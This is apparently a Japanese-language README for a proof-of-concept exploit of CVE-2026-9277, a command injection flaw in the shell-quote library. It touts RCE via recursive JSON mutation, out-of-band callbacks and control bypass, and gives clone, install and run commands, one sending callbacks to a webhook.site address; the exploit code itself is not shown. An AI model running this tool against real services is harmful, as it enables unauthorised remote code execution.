
CVE-2026-9277の概念実証エクスプロイト。shell-quoteライブラリのコマンドインジェクション脆弱性です。再帰的なJSONトラバーサルと組み合わせ変異を実行してRCEをトリガーし、OOB検証とゼロノイズログをサポートします。
shell-quote ライブラリのレガシーバージョン(<= 1.8.3)に存在する構造的コマンドインジェクションの脆弱性である CVE-2026-9277 を検証および実証するために設計された、専用の Proof of Concept(PoC)エクスプロイトスクリプトです。
本スキャナは、入力された JSON ペイロードに対して深い構造的操作を実行し、再帰的トラバーサルを介してリモートコード実行(RCE)ベクトルを露呈させます。動的ネットワークベースラインタイミングエンジンを使用することで、誤検知を防止します。
{"op": "..."} コンポーネントを引数から分離することで高度な Out-of-Band 実行レイアウトを処理し、文字列分離制御を正常にバイパスします。Python 3.10+ と必要なパッケージがインストールされていることを確認してください:
git clone https://github.com/DylanZahedi/CVE-2026-9277.git
cd CVE-2026-9277
pip install requests urllib3
python CVE-2026-9277.py -u "https://example.com/command" -b '{"message_tokens": ["Hello", "from", "normal user"]}'
python CVE-2026-9277.py -u "https://example.com/command" -b '{"user": {"commands": ["a", "b"]}}' -w "https://webhook.site/your-uuid-here"
